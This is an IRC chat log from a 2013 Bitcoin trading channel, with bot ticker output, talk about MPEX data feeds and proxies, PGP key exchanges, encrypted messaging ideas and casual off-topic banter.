bridge you i think Mar 11 05:58:21 at least to prototype Mar 11 05:58:26 i'm going to go ragedelete a whole branch Mar 11 05:58:31 brb Mar 11 05:58:38 back Mar 11 05:59:09 jokes, 90% of it's reusable. Mar 11 05:59:25 wonder how long it will be till someone ddos' coinbr Mar 11 05:59:36 i'm sure bitvps will love that :P Mar 11 06:00:01 Ukto that was yest's news, Mar 11 06:00:03 presumably he moved off shitvps Mar 11 06:00:10 oh? Mar 11 06:00:15 they got their dinky little dc blown to bits, jurov moved Mar 11 06:00:20 mircea_popescu: sorry, i spend my days working. :P Mar 11 06:00:21 mircea_popescu: what data feeds do you recommend for production sites hooking into mpex? Mar 11 06:00:34 benkay my name is going to become "what are you trying to do" Mar 11 06:00:43 mircea_popescu: i am offering a new service Mar 11 06:00:47 or considering making it available Mar 11 06:00:56 that would be very good for this kinda thing Mar 11 06:00:59 pm me if your interested Mar 11 06:00:59 what's that ? Mar 11 06:01:00 :) Mar 11 06:01:08 is it secret ?! Mar 11 06:01:10 since its not public yet Mar 11 06:01:11 :) Mar 11 06:01:14 lol k Mar 11 06:03:41 benkay: try it now :) Mar 11 06:03:47 $depth Mar 11 06:03:49 benkay: http://pastebin.com/raw.php?i=hzJcCSeG Mar 11 06:03:58 beautimous Mar 11 06:04:06 except that now i know about the coinbr data feed Mar 11 06:04:13 and that doesn't change urls every 2 minutes Mar 11 06:04:21 ;) Mar 11 06:04:36 heh, it's much the same data, no worries :) Mar 11 06:04:43 thanks Mar 11 06:04:53 the bot is mostly a backup anyway Mar 11 06:04:57 it's great that you're open to suggestions like that Mar 11 06:05:03 fast turnaround on something i didn't even ask for Mar 11 06:05:55 thanks for the kind words Mar 11 06:06:34 actually the raw response is prolly better Mar 11 06:07:34 [MPEX] [O.BTCUSD.P250N] 15 @ 0.07613082 = 1.142 BTC Mar 11 06:07:37 low bar for kindness in these parts Mar 11 06:07:39 ;) Mar 11 06:08:17 -----BEGIN PGP MESSAGE----- Mar 11 06:08:17 * MJR_ has quit (Remote host closed the connection) Mar 11 06:08:19 lol. Mar 11 06:08:37 was a test...crashed my app Mar 11 06:08:57 heh, have you seen some of the trolls around bitcoin. I should take it as kind that you haven't called me an incestuous pole vaulter or smt Mar 11 06:09:02 but you should be able to decrypt Mar 11 06:09:06 [BTCTC] [ESECURITYSABTC] 1 @ 0.35007 BTC [+] Mar 11 06:09:08 [BTCTC] [ESECURITYSABTC] 4 @ 0.35 = 1.4 BTC [-] Mar 11 06:09:33 MJR_ it kicked you for spam. Mar 11 06:09:43 oh ok Mar 11 06:10:01 the message was too long? Mar 11 06:10:08 too fast. Mar 11 06:10:12 that would be excess flood then Mar 11 06:10:12 oh Mar 11 06:10:19 dunno Mar 11 06:10:27 should have pasted to dpaste Mar 11 06:10:28 not a closed connect. Mar 11 06:10:36 anyway im off Mar 11 06:10:38 later Mar 11 06:10:42 see Mar 11 06:10:45 you later Mar 11 06:11:11 i've seen what constitutes ye olde online community Mar 11 06:11:20 mircea_popescu: could you decrypt it? Mar 11 06:11:28 MJR_ it kicked you for spam. << Mar 11 06:11:49 ah, you didn't get the whole thing then? Mar 11 06:11:50 arguably the only thing i Mar 11 06:11:58 i've ever learned about irc is to just rise above it Mar 11 06:12:02 no matter what "it" is Mar 11 06:12:02 [HAVELOCK] [HIM] 1 @ 1.7 BTC [-] Mar 11 06:12:15 drama wise Mar 11 06:12:16 just what you saw. Mar 11 06:12:26 oh ok hold on Mar 11 06:12:51 ;;gpg info smickles Mar 11 06:12:51 User 'smickles', with keyid EA62D7CEB2450C3F, fingerprint 96ACCA7C3B09EC61B0A6D7F9EA62D7CEB2450C3F, and bitcoin address 12NjnZTVeTJ3g5C7BqfS2aQ2rLkmwiqVz6, registered on Mon Jun 20 12:24:35 2011. http://bitcoin-otc.com/viewgpg.php?nick=smickles . Currently authenticated from hostmask smickles!~smickles@67.222.146.32 . Mar 11 06:13:02 [HAVELOCK] [HIM] 1 @ 1.69 BTC [-] Mar 11 06:13:11 !ticker h sdice Mar 11 06:13:13 [HAVELOCK:SDICE] 1D: 0.58100000 / 0.59986625 / 0.61999910 (296 shares, 177.56040896 BTC), 7D: 0.37000000 / 0.51862844 / 0.62950000 (1570 shares, 814.24665115 BTC), 30D: 0.37000000 / 0.63440004 / 0.76500000 (5705 shares, 3619.25223897 BTC) Mar 11 06:13:22 http://dpaste.com/1018904/ Mar 11 06:13:33 !ticker m s.dice Mar 11 06:13:34 [MPEX:S.DICE] 1D: 0.005884 / 0.00594641 / 0.006 (30926 shares, 183.90 BTC), 7D: 0.00300001 / 0.00559971 / 0.006225 (408254 shares, 2,286.11 BTC), 30D: 0.00300001 / 0.00616299 / 0.0069 (3616799 shares, 22,290.33 BTC) Mar 11 06:13:51 mircea_popescu: that should work Mar 11 06:13:57 okay. Mar 11 06:14:04 it did. Mar 11 06:14:10 !ticker h him Mar 11 06:14:10 [HAVELOCK:HIM] 1D: 1.69000000 / 1.72102475 / 1.75000000 (24 shares, 41.30459400 BTC), 7D: 1.40001001 / 1.56164063 / 1.75000000 (149 shares, 232.68445435 BTC), 30D: 1.40000000 / 3.13202977 / 18.00000000 (247 shares, 773.61135435 BTC) Mar 11 06:14:20 nice! encryption on the iPhone :) Mar 11 06:14:27 and tor browser Mar 11 06:15:41 I would like to create a text message app that would auto encrypt texts, and allow the other side to decrypt easily Mar 11 06:18:00 not a bad idea Mar 11 06:18:06 careful not to mess the key safety tho Mar 11 06:18:43 lot of dead bodies of companies who've tried encrypted im Mar 11 06:19:02 [BTCTC] [B.YABMC] 1 @ 0.01989 BTC [+] Mar 11 06:19:07 yeah Mar 11 06:19:19 silentcircle.com Mar 11 06:19:25 sigaba Mar 11 06:19:30 figure the key exchange maps to "friend request" Mar 11 06:19:32 do this for bitcoin plz :) Mar 11 06:20:32 ;;gpg info mircea_popescu Mar 11 06:20:32 User 'mircea_popescu', with keyid 8A736F0E2FB7B452, fingerprint 6160E1CAC8A3C52966FD76998A736F0E2FB7B452, and bitcoin address None, registered on Fri Jul 22 05:39:10 2011. http://bitcoin-otc.com/viewgpg.php?nick=mircea_popescu . Currently authenticated from hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu . Mar 11 06:20:33 [BTCTC] [B.YABMC] 3 @ 0.01989 = 0.0597 BTC [+] Mar 11 06:20:51 I've always thought someone should make a social network/im that is totally encrypted, so no one but your "friends" can even possibly see your content Mar 11 06:21:26 like not even the host knows what you are posting Mar 11 06:21:45 kinda a good idea Mar 11 06:21:58 blockchain.info style Mar 11 06:22:15 it's badly needed mjr Mar 11 06:23:39 badly needed until you ask for money. then suddenly in the clear is just fine. except for day trading of course Mar 11 06:23:58 lol Mar 11 06:24:09 im just an ADHD person Mar 11 06:24:23 silent circle looks interesting Mar 11 06:24:24 and being able to catgorize posts Mar 11 06:24:33 fb timeline is so shit Mar 11 06:24:40 yes exactly! Mar 11 06:24:45 i want to click on youtube and see all the youtube links i've posted Mar 11 06:24:48 and they mine your data Mar 11 06:25:19 and intergrate it with bitcoin Mar 11 06:25:24 so can have social media payments Mar 11 06:25:33 yeah that would be awesome Mar 11 06:25:54 I actually think that there can be a role for banks as service providers Mar 11 06:26:05 [BTCTC] [GSDPT] 1 @ 0.00544 BTC [-] Mar 11 06:26:10 as opposed to lenders/crooks Mar 11 06:26:23 banks think that too Mar 11 06:26:48 well...in bitcoin land it actually makes sense Mar 11 06:26:53 [BTCTC] [GSDPT] 1 @ 0.00544 BTC [-] Mar 11 06:27:11 [BTCTC] [BASIC-MINING] 1 @ 0.344 BTC [-] Mar 11 06:27:32 I think one problem is that of convenience...and they can handle recurring payments etc. Mar 11 06:27:33 i'd like to see like a youtube clone where you can pay for a stream or HQ dl via bitcoin or tipstream Mar 11 06:27:49 that would be cool Mar 11 06:27:51 corncobs can handle recurring payments Mar 11 06:28:02 what is that? Mar 11 06:28:02 [BTCTC] [ASICMINER-PT] 2 @ 0.7 = 1.4 BTC [+] Mar 11 06:28:04 i'm working on something Mar 11 06:28:22 spelling corncobs = cronjobs Mar 11 06:28:27 [BTCTC] [COGNITIVE] 2 @ 0.1999 = 0.3998 BTC [+] Mar 11 06:28:38 true Mar 11 06:28:41 corncobs are for smoking Mar 11 06:28:47 also true Mar 11 06:28:55 <[\\\]> hey mircea_popescu Mar 11 06:28:55 well i want to make a movie and as an experiment see if maybe it plays for 5mins or something and then'll it'll stop and ask for like some btc to watch the rest of the stream or you can dl my video with a quick bitcoin payment Mar 11 06:28:57 [BTCTC] [S.DICE-PT] 2 @ 0.0057 = 0.0114 BTC [-] Mar 11 06:29:00 <[\\\]> tap your bish on the head for me Mar 11 06:29:01 <[\\\]> https://bitcointalk.org/index.php?topic=141503.msg1607217#msg1607217 Mar 11 06:29:01 I meant for people who know how to check email Mar 11 06:29:01 [\\\] hey slashes Mar 11 06:29:13 <[\\\]> I lol'd for that one Mar 11 06:29:15 lol Mar 11 06:29:25 [BTCTC] [S.MPOE-PT] 2 @ 0.000726 = 0.0015 BTC [+] Mar 11 06:30:07 she's got teeth on her that one does she. Mar 11 06:30:17 [BTCTC] [ESECURITYSABTC] 1 @ 0.4 BTC [+] Mar 11 06:30:26 im really curious if someone will try a fractional reserve banking thing with bitcoins Mar 11 06:30:56 mtgox Mar 11 06:31:20 [BTCTC] [BTC-TRADING-PT] 1 @ 0.18997 BTC [+] Mar 11 06:31:25 oh yeah true...though I thought the coupons were based on their cash Mar 11 06:31:45 also I heard they had to stop that Mar 11 06:32:20 [BTCTC] [BASIC-MINING] 2 @ 0.345 = 0.69 BTC [+] Mar 11 06:32:26 it's not really proven or anything. more like konspiraci theory Mar 11 06:33:22 well, I guess it could be done aboveboard...more like CD's than demand deposits Mar 11 06:34:10 MJR_ nobody will wait for the bitcoin payment to clear to watch their movie. Mar 11 06:34:40 well that was BitHub Mar 11 06:34:59 but also with micropayments I doubt you will wait Mar 11 06:35:13 do you mean because of the confirm? Mar 11 06:35:29 yes Mar 11 06:35:39 bitcoin fail Mar 11 06:35:44 also, 6 confirms is arbitrary...really comes down to your levels of trust Mar 11 06:35:59 i had txs waited for 6 hours just to be included two days ago Mar 11 06:36:02 [BTCTC] [ESECURITYSABTC] 1 @ 0.4 BTC [+] Mar 11 06:36:03 when the chaos was happening. Mar 11 06:36:13 try sitting at cafe for 6hours Mar 11 06:36:22 run out of shit to talk about after 2 Mar 11 06:36:31 and i have old coinbases and etc. average joe with smallish inputs... ouch. Mar 11 06:36:48 i never want to see that person again Mar 11 06:36:48 the Jon Stewart vs Bill O'Reilly was like that, $5 to watch Mar 11 06:37:12 were they naked ? Mar 11 06:37:16 lol Mar 11 06:37:17 lul Mar 11 06:37:20 [BTCTC] [ASICMINER-PT] 1 @ 0.7 BTC [+] Mar 11 06:37:34 Im so glad you didn't mean bill O'Reilly Mar 11 06:37:45 [\\\] btw, you seen inau anywhere ? Mar 11 06:39:05 [BTCTC] [MININGCO.ETF] 1 @ 0.5789 BTC [+] Mar 11 06:40:09 https://bitcointalk.org/index.php?topic=140472.msg1608597#msg1608597 Mar 11 06:40:12 cablepair tagged Mar 11 06:41:25 I miss polimedia Mar 11 06:41:41 the forum is boring Mar 11 06:42:42 MJR_ im all backed up here lol, get prepared cause when it goes back online it'll rain articles Mar 11 06:42:55 nice Mar 11 06:45:37 interesting to see the face behind S.DICE, he also mentions the "bitinstant bitcoin debit card" http://www.youtube.com/watch?v=YbLYmjXsydM Mar 11 06:46:10 you never saw evoorhees' ugly mug before ? Mar 11 06:46:15 lol Mar 11 06:46:17 only the mask Mar 11 06:46:17 [BTCTC] [COGNITIVE] 1 @ 0.1999 BTC [+] Mar 11 06:46:28 his office is 7 blocks from mine Mar 11 06:47:22 I wish I knew the overlap between iPhone jailbreakers and bitcoins Mar 11 06:47:47 ? Mar 11 06:48:04 MJR_ there was some dude jailbreaking anything in the forum, Mar 11 06:48:19 for example, cydia doesn't let you pay with btc Mar 11 06:48:29 which to me seems obvious Mar 11 06:48:47 MJR_: I asked saurik about that once, let me see if I can find his response Mar 11 06:48:55 I've never bought one thing there Mar 11 06:49:12 cuz too much hassle and don't want my cc info floating around Mar 11 06:49:28 also, freenode Mar 11 06:49:31 [BTCTC] [BTC-TRADING-PT] 1 @ 0.19879 BTC [+] Mar 11 06:49:36 another obvious one Mar 11 06:50:09 [BTCTC] [BASIC-MINING] 1 @ 0.345 BTC [+] Mar 11 06:50:34 obvious what ? Mar 11 06:51:14 they seem sorry that they can only accept cc and Paypal Mar 11 06:51:31 on their donation page Mar 11 06:51:32 a a Mar 11 06:51:48 I was going to get a cloak Mar 11 06:52:27 o yeah wtf happened to those Mar 11 06:52:29 MJR_: http://pastie.org/pastes/6448246/text?key=s0rdeomgzommfp93xtapw Mar 11 06:53:16 pizzaman1337: lol taxes Mar 11 06:54:07 heh. Mar 11 06:54:29 what chan are they usually on? Mar 11 06:54:35 if he needed to convert it to fiat to payout devs, it might not be unavoidable Mar 11 06:54:48 private chans, different irc server.. Mar 11 06:54:58 MJR_: just ask in #freenode Mar 11 06:55:25 pizzaman1337: sucks Mar 11 06:55:33 yeah Mar 11 06:55:49 also, anonymous...also seems like an obvious fit Mar 11 06:56:01 and perhaps they are using it Mar 11 06:56:12 they are after all anonymous Mar 11 06:56:36 but you would think they would be more vocal as they hate banks etc Mar 11 07:00:02 [HAVELOCK] [SDICE] 10 @ 0.583 = 5.83 BTC [-] Mar 11 07:00:41 whats anonymous? Mar 11 07:01:04 did mircea pay his taxes this year? Mar 11 07:01:07 :P Mar 11 07:01:10 the hacktivist group Mar 11 07:01:18 [BTCTC] [GSDPT] 2 @ 0.005425 = 0.0109 BTC [-] Mar 11 07:01:19 there is no hacktavist group Mar 11 07:01:27 whatever Mar 11 07:01:38 there is thousands of retarded children with a handfull of hackers hiding behind them Mar 11 07:01:48 the people who "hack" and refer to themselves as "Anonymous" Mar 11 07:01:57 thats like 7 people Mar 11 07:02:02 [HAVELOCK] [SDICE] 1 @ 0.5810005 BTC [-] Mar 11 07:02:04 [HAVELOCK] [SDICE] 10 @ 0.5810003 = 5.81 BTC [-] Mar 11 07:02:05 [HAVELOCK] [SDICE] 10 @ 0.581 = 5.81 BTC [-] Mar 11 07:02:09 the rest are just hitting f5 Mar 11 07:02:16 that's fine Mar 11 07:02:24 was not referring to their skill Mar 11 07:02:33 but rather their inferred ideals Mar 11 07:02:37 BitHub sure dood. Mar 11 07:02:41 it requires at least as much skill to use bitcoins as breath through ones nose Mar 11 07:03:08 dub how do you explain most cocksuckers can't use bitcoin ? Mar 11 07:03:15 which excludes anyone that refers to themself as anon Mar 11 07:03:17 dub: wait, not sure if you mean it's easy or hard Mar 11 07:03:28 its hard Mar 11 07:03:34 its harder than hitting f5 Mar 11 07:03:37 even for people who aren't totally noob at internet Mar 11 07:03:47 really? Mar 11 07:03:51 just takes some time Mar 11 07:03:55 ok. I agree Mar 11 07:04:05 but I think it's relatively easy Mar 11 07:04:18 the hardest part is getting btc Mar 11 07:04:24 that is getting harder Mar 11 07:04:53 and that is only hard because of lame banks and difficulty of moving money Mar 11 07:05:02 sorry i mean it is hard at first Mar 11 07:05:02 [HAVELOCK] [SDICE] 3 @ 0.580001 = 1.74 BTC [-] Mar 11 07:05:03 [HAVELOCK] [SDICE] 3 @ 0.571 = 1.713 BTC [-] Mar 11 07:05:04 [HAVELOCK] [SDICE] 3 @ 0.570001 = 1.71 BTC [-] Mar 11 07:05:06 really hard Mar 11 07:05:07 once you have some it is simple Mar 11 07:05:19 [BTCTC] [ASICMINER-PT] 23 @ 0.7 = 16.1 BTC [+] Mar 11 07:06:00 tell me the tipbot on Reddit is hard Mar 11 07:06:12 reddit is hard Mar 11 07:06:29 i only go to the bitcoin subredit Mar 11 07:06:30 hahaha, maybe hard to set up if you want to donate Mar 11 07:06:44 but I think for people receiving it, it's easy Mar 11 07:06:46 life's hard Mar 11 07:06:50 lol Mar 11 07:06:50 ! Mar 11 07:06:59 [BTCTC] [ASICMINER-PT] 10 @ 0.719999 = 7.2 BTC [+] Mar 11 07:07:04 it creates a wallet for you Mar 11 07:07:19 hi all, http://mpex.coinbr.com/mpex-mktdepth.php fixed to be plain json Mar 11 07:07:26 i'm just over learning new shit all the time Mar 11 07:07:38 hi jurov Mar 11 07:07:53 there's special config for it cause by default things are cached 15 mins Mar 11 07:08:01 and i left jsonp part there Mar 11 07:08:11 mystery unravelled Mar 11 07:09:18 mircea_popescu: give $proxies a go Mar 11 07:09:23 $proxies Mar 11 07:09:25 mircea_popescu: ["http://mpex.coinbr.com"] Mar 11 07:09:30 coolness. Mar 11 07:09:33 oh no Mar 11 07:09:45 jurov ; this is intended to function as a permanent and maintained proxy list Mar 11 07:09:48 [BTCTC] [ASICMINER-PT] 2 @ 0.72 = 1.44 BTC [+] Mar 11 07:09:54 so that everyone can write code referencing here and always be online. Mar 11 07:10:02 [BTCTC] [BASIC-MINING] 1 @ 0.345 BTC [+] Mar 11 07:10:03 how come no mpex room? Mar 11 07:10:03 really its a ddos c&c Mar 11 07:10:05 even with distributed clients, or w/e Mar 11 07:10:06 :) Mar 11 07:10:10 seems like everyone else is too afraid to get listed? Mar 11 07:10:10 dub ayup Mar 11 07:10:20 dupe it to $target Mar 11 07:10:30 jurov you get the standing ovation of being the only one there for a bit :D Mar 11 07:11:05 but anyway, anyone writing code for mpex interfacing, bear the list in mind. Mar 11 07:11:23 mircea_popescu and myself can add to the list with $proxies Mar 11 07:11:53 the end scenario here is that the internet ends but mpex survives by now. Mar 11 07:12:26 and now... Mar 11 07:12:27 beer Mar 11 07:12:30 bbs? Mar 11 07:12:58 let me pull out my 8000 baud modem Mar 11 07:13:16 the-bucket-shop: no, next step, global meshnet Mar 11 07:13:42 smickles: that would be awesome Mar 11 07:13:48 someone was talking about a bitcoin over ham radio protocol a while bac Mar 11 07:13:49 with nodes receiving their due in bitcoin for opperating Mar 11 07:14:06 automagically Mar 11 07:14:09 ham would be cool Mar 11 07:14:12 but a network of phone numbers with modems would be really easy Mar 11 07:14:23 but I think at least in urban areas Mar 11 07:14:30 wifi will work best Mar 11 07:14:51 don't forget to throw some fax numbers in the mix Mar 11 07:14:56 lol Mar 11 07:14:59 multi-frequency mesnet. hams could jump the long distances, wifi for cities Mar 11 07:15:06 yeah Mar 11 07:15:16 now with 5ghz wifi Mar 11 07:15:17 ham > 250 or w/o line of site < 250 Mar 11 07:15:19 i was sitting on sidelines for mpoe shares until I watched you guys knock this thing up. I'm a shareholder now because of it… Mar 11 07:15:24 250 miles that is Mar 11 07:15:26 bandwidth is no problem Mar 11 07:16:00 dialup nodes should already be there tbh Mar 11 07:16:04 the-bucket-shop: welcome :) Mar 11 07:16:11 costs nothing but a phone number Mar 11 07:16:26 much more resilient than internet and most radio Mar 11 07:17:02 well...relies on existing infrastructure under others control Mar 11 07:17:17 actually the plan was to have tcp/ip reimpremented over pigeons Mar 11 07:17:24 lolz Mar 11 07:17:25 no different to anything else Mar 11 07:17:40 and pstn still stays up well after teh lights go out (mostly) Mar 11 07:17:46 see, that's why meshnet is awesome, you contribute what you have, even if it is just a pigeon Mar 11 07:17:49 well a community could implement a wireless mesh network under their control Mar 11 07:18:08 it all falls down to power tho Mar 11 07:18:14 MJR_: thats other peoples infrastructure too Mar 11 07:18:15 they can shut off the grid Mar 11 07:18:29 they can stop shipments of gas Mar 11 07:18:31 I meant AT&T not your neighbor Mar 11 07:18:37 let us bouce teh orderz from ionosphere Mar 11 07:18:40 and get sun/wind Mar 11 07:18:42 *bounce Mar 11 07:18:49 only ham works in that case Mar 11 07:19:05 solar and wind power would be easily spotted,dissappeared Mar 11 07:19:11 bitcoin in a walking dead type world Mar 11 07:19:17 we're just fucked. lets stop now Mar 11 07:19:24 ;D Mar 11 07:19:48 https://twitter.com/xiaolai/status/302410515953623040 Mar 11 07:19:49 dafuck Mar 11 07:20:07 walking dead world only takes a few years to resolve though Mar 11 07:20:22 mircea_popescu: what's the scribbles mean on that? Mar 11 07:20:28 theres what 400k people in america? Mar 11 07:20:29 no idea Mar 11 07:20:44 guy Fawkes mask Mar 11 07:20:49 is that who did the ddos? Mar 11 07:20:53 probably at least that many bullets in your avg small town Mar 11 07:21:11 dub: 400k in America? Mar 11 07:21:16 google translate says "It turned out that the Chinese people do ah! Mailboxes are" Mar 11 07:21:17 idk Mar 11 07:21:26 lol Mar 11 07:21:29 is it less? Mar 11 07:21:30 most people with guy fawkes masks want to overthrow the gov't and replace it w/ a theocracy. just like guy fawkes, right? Mar 11 07:21:42 400M rather Mar 11 07:21:46 smickles: not that I know of Mar 11 07:22:01 dub: there u go lol, I was confused Mar 11 07:22:03 still, not that many zombies to clean up Mar 11 07:22:04 BitHub i don't think so. Mar 11 07:22:13 MJR_: so why do they wear guy fawkes masks? Mar 11 07:22:43 smickles: because they want to hit f5 Mar 11 07:23:06 they should turn it up to f11 Mar 11 07:23:15 betsotbitcoin who ddos mpex? Mar 11 07:23:18 of Mar 11 07:23:23 that scientology raid has a lot to answer for Mar 11 07:23:40 there is no mask wearing legion Mar 11 07:23:44 anti-cyber-surveillance; Mar 11 07:23:51 gabridome hey, link to your github again ? Mar 11 07:23:55 well Mar 11 07:24:28 mircea_popescu: https://github.com/gabridome/mpex-sh Mar 11 07:24:33 go figure Mar 11 07:24:35 they apparently want to fight against banks, religions that are mean, and govt spying Mar 11 07:24:38 ty Mar 11 07:25:01 occupy wasn't anon Mar 11 07:25:07 yes Mar 11 07:25:09 t Mar 11 07:25:14 you are right Mar 11 07:25:22 but there was some overlap Mar 11 07:25:46 anti-cyber-surveillance; Mar 11 07:26:04 I'm assuming the options with ids ending in "T" are "this month" and "N" are "next month"? Mar 11 07:26:11 yup Mar 11 07:26:20 last friday of the month Mar 11 07:26:35 pizzaman1337, yes Mar 11 07:27:23 it might be a good idea to put that in the FAQ, didn't see it there Mar 11 07:27:26 fighting against govt spying is just trolling Mar 11 07:27:34 i loved it when some guy said that the options' ids were needlessly complicated and incomprehensible... i pointed out an option on google. i won. Mar 11 07:27:39 govt has been looking at everything for a long time Mar 11 07:28:01 that cow is out the gate Mar 11 07:28:34 dub: cow tipping is a prized sport where i come from Mar 11 07:29:28 THATs why the right to bear arms is so important Mar 11 07:29:41 shoot the cow tippers Mar 11 07:29:49 ? Mar 11 07:29:58 you need arms to tip a cow Mar 11 07:30:04 lol Mar 11 07:30:42 <[\\\]> not true Mar 11 07:30:44 its all clear now Mar 11 07:30:44 <[\\\]> feet. Mar 11 07:31:12 how are you going to open the gate? Mar 11 07:31:33 lol, I don't understand the logic in maintaining a "right" from the people you need that right to protect yourself from Mar 11 07:31:48 <[\\\]> feet. Mar 11 07:31:59 <[\\\]> Cow gates aren't complicated. Mar 11 07:32:08 govt. give me the right to have a gun, so that I can stop you from taking my gun? Mar 11 07:32:09 <[\\\]> Its not like they've got combo dials Mar 11 07:32:15 smickles lol Mar 11 07:32:16 MJR_: neither, its like but you elected them? Mar 11 07:32:42 MJR_: well, it started out from the perspective that gov't should be subserviant (sp?) to individuals Mar 11 07:32:45 to me, it is seeming like gives are increasingly less relevant Mar 11 07:33:00 subservient Mar 11 07:33:02 govts* Mar 11 07:33:03 the right doesn't come from the gov't Mar 11 07:33:03 [HAVELOCK] [SDICE] 1 @ 0.57 BTC [-] Mar 11 07:33:13 it is put upon the gov't Mar 11 07:33:14 I agree Mar 11 07:33:24 thx mircea_popescu :) Mar 11 07:33:40 point being, what they choose to do doesn't matter Mar 11 07:34:10 only brought up govt bc most people in murica refer to the 2nd amendment Mar 11 07:34:27 [\\\]: you've got to lift the little springy bit holding the chain latching teh gate shut Mar 11 07:34:54 you can do that with your tit Mar 11 07:35:16 MJR_: thing is, the 2nd amendment doesn't prevent them from taking the guns, it just prevents them from making a law to prohibit gun ownership Mar 11 07:35:51 if you trust them to follow rules... Mar 11 07:35:51 A dollar spent mining bitcoins in 2010 now worth $53K. Mar 11 07:35:53 hehe. Mar 11 07:36:31 ;;ticker Mar 11 07:36:32 BTCUSD ticker | Best bid: 46.72010, Best ask: 46.98800, Bid-ask spread: 0.26790, Last trade: 46.98898, 24 hour volume: 30169.98410034, 24 hour low: 45.47100, 24 hour high: 47.70000, 24 hour vwap: 46.51254 Mar 11 07:36:32 2nd amendment protects encryption too - as well as probably bitcoin Mar 11 07:36:32 [BTCTC] [ASICMINER-PT] 3 @ 0.72 = 2.16 BTC [+] Mar 11 07:36:53 ;;view Mar 11 07:36:54 #13941 Sun Mar 10 09:58:52 2013 smickles SELL 20.0 btc @ 49.82 usd (None) Mar 11 07:36:55 they stopped classifying encryption as a munition Mar 11 07:37:06 yeah, pgp busted that Mar 11 07:37:22 I posted a link to that xkcd Mar 11 07:37:35 i've got a copy of the original pgp source code somewhere Mar 11 07:37:44 printed when that whole debacle was going on Mar 11 07:38:34 people are great, gov't is liek: it's illegal to distribute that code!! peeps are like: let's print it in a book and send it everywhere!!!! Mar 11 07:38:55 lo lyup Mar 11 07:39:12 kakobrekla so intrade is shut down. where's all the experts advising bitbet should be more like intrade ? Mar 11 07:39:16 a good copy of that book is worth upwards of 100 usd now iirc Mar 11 07:39:32 that's what i want to know. for all the posturing and pretense when they're wrong but don't know it yet, Mar 11 07:39:42 where's the humility and apologetics when it's proven they were in fact wrong ? Mar 11 07:39:47 *crickets* Mar 11 07:39:50 <[\\\]> I'm sorry. Mar 11 07:39:54 <[\\\]> There, I said it. Mar 11 07:40:03 lol were you the guy with the emails ? Mar 11 07:40:06 :) Mar 11 07:40:25 mircea_popescu: not likely, imsa is quite a good troll Mar 11 07:40:26 <[\\\]> I made no comments about intrade or bitbet Mar 11 07:40:35 ;) Mar 11 07:40:40 there was this one guy, jesus, i even blogged about him Mar 11 07:40:41 <[\\\]> but I can be humble and apologetic. Mar 11 07:40:44 [\\\] wd! Mar 11 07:40:55 [\\\] for this weeks' bitcoin jesus Mar 11 07:41:00 <[\\\]> mircea_popescu: you're blogging about jesus? Mar 11 07:41:07 <[\\\]> is that bible 2.0? Mar 11 07:41:08 ahahah Mar 11 07:41:17 wait, bitcoin jesus was an actual topic? Mar 11 07:41:18 nono, this guy explaining to me the virtues of intradelineness Mar 11 07:41:23 not just a joke the other day? Mar 11 07:41:24 jesus is just an expletive Mar 11 07:41:26 like fuck Mar 11 07:41:33 <[\\\]> but that isn't clear from your text Mar 11 07:41:37 <[\\\]> your girl would rip you on it. Mar 11 07:41:42 heh Mar 11 07:41:56 i pay her to point outwards Mar 11 07:42:00 not inwards. Mar 11 07:42:06 so, it's "bitcoin JESUS!" Mar 11 07:42:11 not to confuse but I think bitcoin Jesus was def a topic Mar 11 07:42:15 <[\\\]> is that why she wears a strapon? Mar 11 07:42:24 [\\\] it's a spikeon Mar 11 07:42:30 <[\\\]> you're a kinky fellow Mar 11 07:42:46 better kinky than cooky i always say. Mar 11 07:43:00 <[\\\]> smickles, its well after bedtime. I claim no credit for my antics. Mar 11 07:43:02 👍 Mar 11 07:43:03 +1 for informative titles Mar 11 07:43:14 also max keiser is going bitcoincrazy Mar 11 07:43:21 <[\\\]> who is max keiser? Mar 11 07:43:28 this nutjob guy Mar 11 07:43:33 [\\\]: beer 4 here, any neat stuff i say is lucky Mar 11 07:43:34 <[\\\]> did anyone see the tweet from the old, self proclaimed bitcoin jesus? Mar 11 07:43:40 that's when bitcoin Jesus came up Mar 11 07:43:45 Timothy Maxwell "Max" Keiser is an American broadcaster and film-maker. He hosts Keiser Report, a financial program broadcast on RT. Mar 11 07:43:50 s/neat/witty/ Mar 11 07:44:00 I like that chick from RT Mar 11 07:44:05 his name would be timothy Mar 11 07:44:07 <[\\\]> smickles, I knew what you meant. You're well paste neat, trending towards sloppy. Mar 11 07:44:10 that;'s him MJR_ Mar 11 07:44:16 <[\\\]> past* Mar 11 07:44:32 parseval pgp pigeons pizzaman1337 Populus PsychoticBoy Pucilowski Mar 11 07:44:36 He is crazy Mar 11 07:44:43 [\\\] he';s not sloppy, shampoo is just very expensive where he lives. Mar 11 07:44:48 <[\\\]> Whatever happened to all of the different bitcoin vblogs? Mar 11 07:44:50 lol Mar 11 07:45:02 <[\\\]> There used to be all of these different 'shows' Mar 11 07:45:06 avoid the keiser report Mar 11 07:45:08 <[\\\]> back when coins were like 'free' Mar 11 07:45:10 lol, mircea_popescu my wife just told me to wash my hair too Mar 11 07:45:20 we clearly have a konspiraci Mar 11 07:45:25 <[\\\]> smickles, I'm pretty certain she was talking about your ass. Mar 11 07:45:52 f1b69921 expired? Mar 11 07:45:57 I think there is a conspiracy going on to change the spelling to konspiraci Mar 11 07:46:00 [BTCTC] [S.MPOE-PT] 14 @ 0.000726 = 0.0102 BTC [+] Mar 11 07:46:03 Rick__ yes rick, need to switch over to new key. Mar 11 07:46:08 /¯(°_o)/¯ Mar 11 07:46:12 did you see the announcement last month ? Mar 11 07:46:13 where is the new key? Mar 11 07:46:17 k 1 sec Mar 11 07:46:20 <[\\\]> smickles, what is that? Mar 11 07:46:38 [\\\] drunk reddit alien Mar 11 07:46:44 [\\\]: it's the i dunno lol dog with one arm backwards Mar 11 07:46:45 <[\\\]> oh Mar 11 07:46:49 http://pastebin.com/9M25zBr7 Mar 11 07:46:52 looks like a zombie to me Mar 11 07:46:58 <[\\\]> it was blending with Rick__ Mar 11 07:47:00 <[\\\]> confusing the look Mar 11 07:47:12 I cant open this website Mar 11 07:47:16 dont know why Mar 11 07:47:17 [BTCTC] [COGNITIVE] 1 @ 0.1999 BTC [+] Mar 11 07:47:26 <[\\\]> jesus Mar 11 07:47:27 oh Mar 11 07:47:30 mk 1 sec Mar 11 07:47:32 did you put the new key in the faq? Mar 11 07:47:35 woah, can't open pastebin? Mar 11 07:47:39 he;s in china Mar 11 07:47:44 yeah Mar 11 07:47:51 it's chinese issue Mar 11 